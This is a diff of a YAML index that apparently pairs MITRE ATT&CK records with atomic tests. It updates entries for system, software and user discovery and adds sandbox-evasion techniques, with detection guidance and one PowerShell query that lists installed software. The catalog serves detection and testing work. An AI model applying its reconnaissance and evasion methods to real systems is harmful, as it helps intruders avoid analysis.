+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ In cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Process command-line parameters
+ x_mitre_version: '2.1'
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
@@ -37633,21 +38652,44 @@ discovery:
- source_name: mitre-attack
external_id: T1518.001
url: https://attack.mitre.org/techniques/T1518/001
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
+ 28). Finding Evil in AWS. Retrieved June 25, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Security Software Discovery
description: |-
- Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+ Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
+
+ Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)
id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-15T01:15:56.113Z'
+ modified: '2020-06-29T17:32:24.787Z'
created: '2020-02-21T21:16:18.066Z'
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -37658,18 +38700,6 @@ discovery:
- Office 365
- Azure AD
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
identifier: T1518.001
atomic_tests:
- name: Security Software Discovery
@@ -37757,7 +38787,7 @@ discovery:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Software Discovery
description: |-
- Adversaries may attempt to get a listing of software and software versions that are installed on a system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+ Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
id: attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58
@@ -37765,8 +38795,24 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T18:56:04.855Z'
+ modified: '2020-06-29T19:34:39.136Z'
created: '2019-09-16T17:52:44.147Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -37777,19 +38823,6 @@ discovery:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
identifier: T1518
atomic_tests:
- name: Find and Display Internet Explorer Browser Version
@@ -37817,11 +38850,108 @@ discovery:
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
name: powershell
- T1082:
+ T1497.001:
technique:
+ id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6
+ description: "Adversaries may employ various system checks to detect and avoid
+ virtualization and analysis environments. This may include changing behaviors
+ based on the results of checks for the presence of artifacts indicative of
+ a virtual machine environment (VME) or sandbox. If the adversary detects a
+ VME, they may alter their malware to disengage from the victim or conceal
+ the core functions of the implant. They may also search for VME artifacts
+ before dropping secondary or additional payloads. Adversaries may use the
+ information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
+ during automated discovery to shape follow-on behaviors. \n\nSpecific checks
+ may will vary based on the target and/or adversary, but may involve behaviors
+ such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047),
+ [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information
+ Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012)
+ to obtain system information and search for VME artifacts. Adversaries may
+ search for VME artifacts in memory, processes, file system, hardware, and/or
+ the Registry. Adversaries may use scripting to automate these checks into
+ one script and then have the program exit if it determines the system to be
+ a virtual environment. \n\nChecks could include generic system properties
+ such as uptime and samples of network traffic. Adversaries may also check
+ the network adapters addresses, CPU core count, and available memory/drive
+ size. \n\nOther common checks may enumerate services running that are unique
+ to these applications, installed programs on the system, manufacturer/product
+ fields for strings relating to virtual machine applications, and VME-specific
+ hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications
+ like VMWare, adversaries can also use a special I/O port to send commands
+ and receive output. \n \nHardware checks, such as the presence of the fan,
+ temperature, and audio devices, could also be used to gather evidence that
+ can be indicative a virtual environment. Adversaries may also query for specific
+ readings from these devices.(Citation: Unit 42 OilRig Sept 2018)"
+ name: System Checks
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
+ - source_name: mitre-attack
+ external_id: T1497.001
+ url: https://attack.mitre.org/techniques/T1497/001
+ - source_name: McAfee Virtual Jan 2017
+ url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
+ description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual
+ Machine. Retrieved April 17, 2019.
+ - url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/
+ description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle
+ Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September
+ 24, 2018.
+ source_name: Unit 42 OilRig Sept 2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.514Z'
+ created: '2020-03-06T20:57:37.959Z'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_detection: Virtualization/sandbox related system checks will likely
+ occur in the first steps of an operation but may also occur throughout as
+ an adversary learns the environment. Data and events should not be viewed
+ in isolation, but as part of a chain of behavior that could lead to other
+ activities, such as lateral movement, based on the information obtained. Detecting
+ actions related to virtualization and sandbox identification may be difficult
+ depending on the adversary's implementation and monitoring required. Monitoring
+ for suspicious processes being spawned that gather a variety of system information
+ or perform other forms of Discovery, especially in a short period of time,
+ may aid in detection.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Signature-based detection
+ - Host forensic analysis
+ - Anti-virus
+ atomic_tests: []
+ T1082:
+ technique:
+ created: '2017-05-31T21:31:04.307Z'
+ modified: '2020-03-26T18:17:42.298Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: System Information Discovery
+ description: |-
+ An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.
+
+ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
+ external_references:
- source_name: mitre-attack
external_id: T1082
url: https://attack.mitre.org/techniques/T1082
@@ -37840,21 +38970,8 @@ discovery:
October 8, 2019.
url: https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get
source_name: Microsoft Virutal Machine API
- description: |-
- An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.
-
- Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
- name: System Information Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T18:17:42.298Z'
- created: '2017-05-31T21:31:04.307Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -38029,21 +39146,21 @@ discovery:
phase_name: discovery
modified: '2020-03-15T00:55:33.136Z'
created: '2017-05-31T21:30:27.342Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery on Windows
@@ -38198,6 +39315,20 @@ discovery:
phase_name: discovery
modified: '2020-03-15T14:15:32.910Z'
created: '2017-05-31T21:30:45.139Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -38205,20 +39336,6 @@ discovery:
- AWS
- GCP
- Azure
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Praetorian
- x_mitre_is_subtechnique: false
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery
@@ -38270,8 +39387,19 @@ discovery:
name: sh
T1033:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:35.733Z'
+ modified: '2020-03-15T01:03:47.866Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: System Owner/User Discovery
+ description: |-
+ Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Utilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1033
@@ -38279,19 +39407,8 @@ discovery:
- external_id: CAPEC-577
source_name: capec
url: https://capec.mitre.org/data/definitions/577.html
- description: |-
- Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Utilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.
- name: System Owner/User Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-15T01:03:47.866Z'
- created: '2017-05-31T21:30:35.733Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -38390,21 +39507,21 @@ discovery:
phase_name: discovery
modified: '2020-03-15T01:05:08.805Z'
created: '2017-05-31T21:30:21.315Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
identifier: T1007
atomic_tests:
- name: System Service Discovery
@@ -38478,21 +39595,21 @@ discovery:
phase_name: discovery
modified: '2020-03-15T01:07:42.700Z'
created: '2017-05-31T21:31:37.450Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - API monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Command-line interface monitoring may be useful to detect
instances of net.exe or other command-line utilities being used to gather
system time or time zone. Methods of detecting API use for gathering this
information are likely less useful due to how often they may be used by legitimate
software.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - API monitoring
+ x_mitre_version: '1.1'
identifier: T1124
atomic_tests:
- name: System Time Discovery
@@ -38526,6 +39643,204 @@ discovery:
'
name: powershell
+ T1497.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.003
+ url: https://attack.mitre.org/techniques/T1497/003
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Time Based Evasion
+ description: "Adversaries may employ various time-based methods to detect and
+ avoid virtualization and analysis environments. This may include timers or
+ other triggers to avoid a virtual machine environment (VME) or sandbox, specifically
+ those that are automated or only operate for a limited amount of time.\n\nAdversaries
+ may employ various time-based evasions, such as delaying malware functionality
+ upon initial execution using programmatic sleep commands or native system
+ scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)).
+ Delays may also be based on waiting for specific victim conditions to be met
+ (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104)
+ to avoid analysis and scrutiny. "
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.532Z'
+ created: '2020-03-06T21:11:11.225Z'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: 'Time-based evasion will likely occur in the first steps
+ of an operation but may also occur throughout as an adversary learns the environment.
+ Data and events should not be viewed in isolation, but as part of a chain
+ of behavior that could lead to other activities, such as lateral movement,
+ based on the information obtained. Detecting actions related to virtualization
+ and sandbox identification may be difficult depending on the adversary''s
+ implementation and monitoring required. Monitoring for suspicious processes
+ being spawned that gather a variety of system information or perform other
+ forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
+ T1497.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.002
+ url: https://attack.mitre.org/techniques/T1497/002
+ - source_name: Sans Virtual Jan 2016
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ - source_name: Unit 42 Sofacy Nov 2018
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: User Activity Based Checks
+ description: "Adversaries may employ various user activity checks to detect
+ and avoid virtualization and analysis environments. This may include changing
+ behaviors based on the results of checks for the presence of artifacts indicative
+ of a virtual machine environment (VME) or sandbox. If the adversary detects
+ a VME, they may alter their malware to disengage from the victim or conceal
+ the core functions of the implant. They may also search for VME artifacts
+ before dropping secondary or additional payloads. Adversaries may use the
+ information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
+ during automated discovery to shape follow-on behaviors. \n\nAdversaries may
+ search for user activity on the host based on variables such as the speed/frequency
+ of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser
+ history, cache, bookmarks, or number of files in common directories such as
+ home or the desktop. Other methods may rely on specific user interaction with
+ the system before the malicious code is activated, such as waiting for a document
+ to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or
+ waiting for a user to double click on an embedded image to activate.(Citation:
+ FireEye FIN7 April 2017) "
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.491Z'
+ created: '2020-03-06T21:04:12.454Z'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Static File Analysis
+ - Signature-based detection
+ - Host forensic analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: 'User activity-based checks will likely occur in the first
+ steps of an operation but may also occur throughout as an adversary learns
+ the environment. Data and events should not be viewed in isolation, but as
+ part of a chain of behavior that could lead to other activities, such as lateral
+ movement, based on the information obtained. Detecting actions related to
+ virtualization and sandbox identification may be difficult depending on the
+ adversary''s implementation and monitoring required. Monitoring for suspicious
+ processes being spawned that gather a variety of system information or perform
+ other forms of Discovery, especially in a short period of time, may aid in
+ detection. '
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process use of network
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
+ T1497:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497
+ url: https://attack.mitre.org/techniques/T1497
+ - source_name: Unit 42 Pirpi July 2015
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Virtualization/Sandbox Evasion
+ description: "Adversaries may employ various means to detect and avoid virtualization
+ and analysis environments. This may include changing behaviors based on the
+ results of checks for the presence of artifacts indicative of a virtual machine
+ environment (VME) or sandbox. If the adversary detects a VME, they may alter
+ their malware to disengage from the victim or conceal the core functions of
+ the implant. They may also search for VME artifacts before dropping secondary
+ or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox
+ Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery
+ to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish
+ [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
+ such as checking for security monitoring tools (e.g., Sysinternals, Wireshark,
+ etc.) or other system artifacts associated with analysis or virtualization.
+ Adversaries may also check for legitimate user activity to help determine
+ if it is in an analysis environment. Additional methods include use of sleep
+ timers or loops within malware code to avoid operating within a temporary
+ sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n"
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.272Z'
+ created: '2019-04-17T22:22:24.505Z'
+ x_mitre_version: '1.2'
